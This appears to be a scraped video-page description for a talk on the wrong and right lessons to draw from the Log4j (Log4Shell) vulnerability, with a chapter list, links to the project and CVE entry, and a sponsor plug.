The wrong lessons to learn from the Log4j vulnerability
Log4j and Java sucks, but I don't use that, so I'm safe...right? Wrong. This video walks through the wrong lessons to take away from the huge Log4j remote code execution vulnerability, known as LogShell, and points you at the lessons you should be learning instead. While the Log4j vulnerability may not directly affect you, its type of vulnerabilities certainly do.
CHAPTERS
00:00 Hook
00:10 Intro
00:35 Log4j vulnerability explained
01:58 1. It's Java's fault
02:51 2. Avoid popular libraries
04:05 3. Avoid 'enterprise' libraries
05:02 4. Backwards compatibility is bad
06:36 5. Write your own common libraries
08:18 Lessons to learn
08:31 1. Sanitize user inputs
09:09 2. Use popular libraries
09:29 3. Keep your libraries up to date
10:19 Outtro
LINKS
Log4j - https://logging.apache.org/log4j/2.x/
Log4j disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
SLEUTH
A deploy-based DORA / Accelerate Metrics tracker both managers and developers love.
Website - https://sleuth.io
Live Demo - https://app.sleuth.io/sleuth/sleuth/metrics/lead_time
Follow us on:
LinkedIn - https://www.linkedin.com/company/sleuth-io
Twitter - https://twitter.com/sleuth_io
Facebook - https://www.facebook.com/SleuthHQ
Twitch (Don streams MTTh, 3 PM MST) - https://twitch.com/mrdonbrown
CHAPTERS
00:00 Hook
00:10 Intro
00:35 Log4j vulnerability explained
01:58 1. It's Java's fault
02:51 2. Avoid popular libraries
04:05 3. Avoid 'enterprise' libraries
05:02 4. Backwards compatibility is bad
06:36 5. Write your own common libraries
08:18 Lessons to learn
08:31 1. Sanitize user inputs
09:09 2. Use popular libraries
09:29 3. Keep your libraries up to date
10:19 Outtro
LINKS
Log4j - https://logging.apache.org/log4j/2.x/
Log4j disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
SLEUTH
A deploy-based DORA / Accelerate Metrics tracker both managers and developers love.
Website - https://sleuth.io
Live Demo - https://app.sleuth.io/sleuth/sleuth/metrics/lead_time
Follow us on:
LinkedIn - https://www.linkedin.com/company/sleuth-io
Twitter - https://twitter.com/sleuth_io
Facebook - https://www.facebook.com/SleuthHQ
Twitch (Don streams MTTh, 3 PM MST) - https://twitch.com/mrdonbrown
Тэги:
#log4j_vulnerability #log4j_exploit #log4j_vulnerability_explained #log4j #log4j_lessons #log_shell_vulnerability #logshell #logshell_vulnerability #log4shell_explained #log4j_vulnerability_2021 #log4shell_vulnerabilityКомментарии:
BigMe inkNote Color + eRreader Review | Is Bigger Better?
Dylan Can Read
![70 、80、90年代经典老歌尽在 经典老歌500首 || 一人一首成名曲 [ 周傳雄 / 張宇 /張惠妹 / 李宗盛 / 縱貫線 / 周傳雄 / 林慧萍 ]【歌词版 / Pinyin Lyrics】](https://invideo.cc/img/upload/NDhkckxRSXd2aVc.jpg "70 、80、90年代经典老歌尽在 经典老歌500首 || 一人一首成名曲 [ 周傳雄 / 張宇 /張惠妹 / 李宗盛 / 縱貫線 / 周傳雄 / 林慧萍 ]【歌词版 / Pinyin Lyrics】")
Сучкорезы LOWE 22 серии
ООО Творница
Chris Christodoulou - Undead Man Walkin' | DEADBOLT (2016)
Chris Christodoulou
Scissors are like RAZOR! An easy way to sharpen Dull Scissors with your own hands!
Двойная Порция Полезных Советов
Mary Jane's Last Dance
Midland - Topic
УГАДАЙ КОНТЕЙНЕР ЗАБЕРИ ТАЧКУ Стилов Булкин Подписчик Юра Волков Илья KICKDOWN и другие
Жекич Дубровский
4 месяца назад
